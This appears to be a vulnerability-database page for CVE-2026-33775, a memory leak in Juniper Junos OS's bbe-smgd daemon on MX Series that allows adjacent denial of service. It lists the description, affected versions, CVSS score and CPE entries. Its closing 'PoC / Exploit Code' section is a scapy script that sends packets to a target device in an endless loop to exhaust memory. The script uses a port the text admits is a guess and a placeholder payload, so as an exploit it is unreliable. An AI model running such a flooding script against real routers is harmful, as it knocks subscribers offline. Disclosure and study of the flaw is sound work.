Security Vulnerability Report
CVE-2026-33775 CVSS 6.5 MEDIUM

Published: 2026-04-09 22:16:26
Last Modified: 2026-04-17 17:40:50

Description

A Missing Release of Memory after Effective Lifetime vulnerability in the BroadBand Edge subscriber management daemon (bbe-smgd) of Juniper Networks Junos OS on MX Series allows an adjacent, unauthenticated attacker to cause a Denial of Service (DoS).

If the authentication packet-type option is configured and a received packet does not match that packet type, the memory leak occurs. When all memory available to bbe-smgd has been consumed, no new subscribers will be able to log in.

The memory utilization of bbe-smgd can be monitored with the following show command:

    user@host> show system processes extensive | match bbe-smgd

The following log message can be observed when this limit has been reached:

    bbesmgd[<PID>]: %DAEMON-3-SMD_DPROF_RSMON_ERROR: Resource unavailability, Reason: Daemon Heap Memory exhaustion

This issue affects Junos OS on MX Series:
 * all versions before 22.4R3-S8,
 * 23.2 versions before 23.2R2-S5,
 * 23.4 versions before 23.4R2-S6,
 * 24.2 versions before 24.2R2-S2,
 * 24.4 versions before 24.4R2,
 * 25.2 versions before 25.2R2.

CVSS Details

CVSS Score: 6.5
Severity: MEDIUM
CVSS Vector: CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

Configurations (Affected Products)

cpe:2.3:o:juniper:junos:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:o:juniper:junos:22.4:-:*:*:*:*:*:* - VULNERABLE
cpe:2.3:o:juniper:junos:22.4:r1:*:*:*:*:*:* - VULNERABLE
cpe:2.3:o:juniper:junos:22.4:r1-s1:*:*:*:*:*:* - VULNERABLE
cpe:2.3:o:juniper:junos:22.4:r1-s2:*:*:*:*:*:* - VULNERABLE
cpe:2.3:h:juniper:mx10004:-:*:*:*:*:*:*:* - NOT VULNERABLE
cpe:2.3:h:juniper:mx10008:-:*:*:*:*:*:*:* - NOT VULNERABLE
cpe:2.3:h:juniper:mx2008:-:*:*:*:*:*:*:* - NOT VULNERABLE
cpe:2.3:h:juniper:mx2010:-:*:*:*:*:*:*:* - NOT VULNERABLE
cpe:2.3:h:juniper:mx2020:-:*:*:*:*:*:*:* - NOT VULNERABLE
Junos OS on MX Series < 22.4R3-S8
Junos OS on MX Series 23.2 < 23.2R2-S5
Junos OS on MX Series 23.4 < 23.4R2-S6
Junos OS on MX Series 24.2 < 24.2R2-S2
Junos OS on MX Series 24.4 < 24.4R2
Junos OS on MX Series 25.2 < 25.2R2

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
from scapy.all import *
import time

# Configuration
# Target IP of the Juniper MX device
target_ip = "192.168.1.1"
# Port used by bbe-smgd (Needs specific reconnaissance, example port)
target_port = 2000
interface = "eth0"

def send_malicious_packet():
    # Construct a packet that does not match the expected 'authentication packet-type'
    # This simulates the trigger condition for the memory leak
    packet = IP(dst=target_ip)/UDP(dport=target_port)/Raw(load="MALFORMED_AUTH_PAYLOAD")
    print(f"[*] Sending packet to {target_ip}...")
    send(packet, iface=interface, verbose=0)

print("[+] Starting DoS simulation for CVE-2026-33775")
print("[!] This will consume memory in bbe-smgd if the vulnerability is unpatched.")
try:
    while True:
        send_malicious_packet()
        # Short delay to avoid flooding the network too hard, but enough to leak memory
        time.sleep(0.1)
except KeyboardInterrupt:
    print("\n[-] Attack stopped.")
